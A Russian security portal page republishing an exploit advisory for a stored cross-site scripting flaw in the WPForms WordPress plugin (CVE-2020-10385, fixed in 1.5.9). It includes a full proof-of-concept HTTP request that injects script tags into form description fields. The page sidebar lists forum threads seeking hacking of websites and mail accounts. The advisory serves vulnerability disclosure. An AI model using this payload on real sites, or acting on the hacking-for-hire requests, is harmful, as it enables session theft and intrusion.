Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Эксплойт (exploit) Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting

25.03.2020



# Exploit Title: Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting # Date: 2020-02-18 # Vendor Homepage: https://wpforms.com # Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 1.5.8.2 and below # CVE : CVE-2020-10385 1. Description WPForms is a popular WordPress forms plugin with over 3 million active installations. The Form Description and Field Description fields in the WPForms plugin’s Form Builder module was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. While they do not pose high security threat being an authenticated XSS vulnerability, an attacker can potentially exploit this to perform malicious actions on a WordPress multisite installation to have a super admin’s cookies sent to the attacker or redirect the super admin to another domain, for example, a phishing page designed to show that they have been logged out and would need to log back in, thus compromising their credentials. The form builder’s “preview” function was also vulnerable to reflected XSS. All WordPress websites using WPForms version 1.5.8.2 and below are affected. 2. Proof of Concept POST /wp-admin/admin-ajax.php HTTP/1.1 Host: ptest.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://ptest.com/wp-admin/admin.php?page=wpforms-builder&view=settings&form_id=23 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 3140 Origin: http://ptest.com Connection: close Cookie: wp-saving-post=15-saved; wordpress_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cf826697f923b7f17c30049eea275c6523b7e2418ab354e106c50f0314b9bdae9; [email protected]flywheel.local; comment_author_db156a460ca831632324809820a538ce=jinson; wp-settings-time-1=1581973079; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cbaecd49d797bff21499da712891744737c67fd481d59e04a952554579f26c637 action=wpforms_save_form&data=%5B%7B%22name%22%3A%22id%22%2C%22value%22%3A%2223%22%7D%2C%7B%22name%22%3A%22field_id%22%2C%22value%22%3A%2213%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bid%5D%22%2C%22value%22%3A%2211%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Btype%5D%22%2C%22value%22%3A%22text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blabel%5D%22%2C%22value%22%3A%22Single+Line+Text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdescription%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bsize%5D%22%2C%22value%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bplaceholder%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_count%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_mode%5D%22%2C%22value%22%3A%22characters%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdefault_value%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bcss%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Binput_mask%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bform_title%5D%22%2C%22value%22%3A%22Security+Test+WPForms%22%7D%2C%7B%22name%22%3A%22settings%5Bform_desc%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description+2%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bform_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text%5D%22%2C%22value%22%3A%22Submit%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text_processing%5D%22%2C%22value%22%3A%22Sending...%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bhoneypot%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotification_enable%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bemail%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsubject%5D%22%2C%22value%22%3A%22New+Security+Test+WPForms+Entry%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_name%5D%22%2C%22value%22%3A%22ptest%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_address%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Breplyto%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%7Ball_fields%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Btype%5D%22%2C%22value%22%3A%22message%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%3Cp%3EThanks+for+contacting+us!+We+will+be+in+touch+with+you+shortly.%3C%2Fp%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage_scroll%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bpage%5D%22%2C%22value%22%3A%222%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bredirect%5D%22%2C%22value%22%3A%22%22%7D%5D&id=23&nonce=938cf431d2 3. Timeline Vulnerability reported to the WPForms team – February 18, 2020 WPForms version 1.5.9 containing the fix released – March 5, 2020

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Web apps
Опубликовал: shellmann
Просмотров: 510
Проголосовало через SMS: 0
Ключевые слова: exploit, wordpress, xss, (найти похожие документы)
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Уязвимость в iOS блокирует шифрование трафика VPN
  • Зафиксирован новый случай использования крайне редкой атаки BadUS...
  • Опубликован способ обхода PPL для внедрения шелл-кода
  • ФБР ликвидировали deer.io
  • Пользователи iOS в Гонконге стали жертвами многофункциональной ма...
  • Украдены исходные коды графических процессоров AMD
  • Фейковое расширение для Chrome используется для кражи криптовалют...
  • В Tor снова исправлена уязвимость, деанонимизировавшая пользовате...
  • В OpenWrt исправлена критическая уязвимость
  • WhatsApp хранит коды для 2FA в открытом виде

    Все новости... Все статьи... Прислать новость RSS
  • Портал / Отзывы и предложения » Re: Make HackZone Great Again
  • Разное / Предложения работы » взлом сайта
  • Взлом и безопасность / Программы » ISBC Telecom обеспечит смс-информирование персонала на удале
  • Взлом и безопасность / Разное » Re: Живу в Туркменистане, SOS
  • Взлом и безопасность / Разное » Re: Живу в Туркменистане, SOS
  • Взлом и безопасность / Разное » Re: Живу в Туркменистане, SOS
  • Взлом и безопасность / Разное » Живу в Туркменистане, SOS
  • Разное / Предложения работы » Взлом CRM сайта
  • Портал / Отзывы и предложения » Re: Make HackZone Great Again
  • Разное / Ищу работу » Re: взлом почты на майле

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}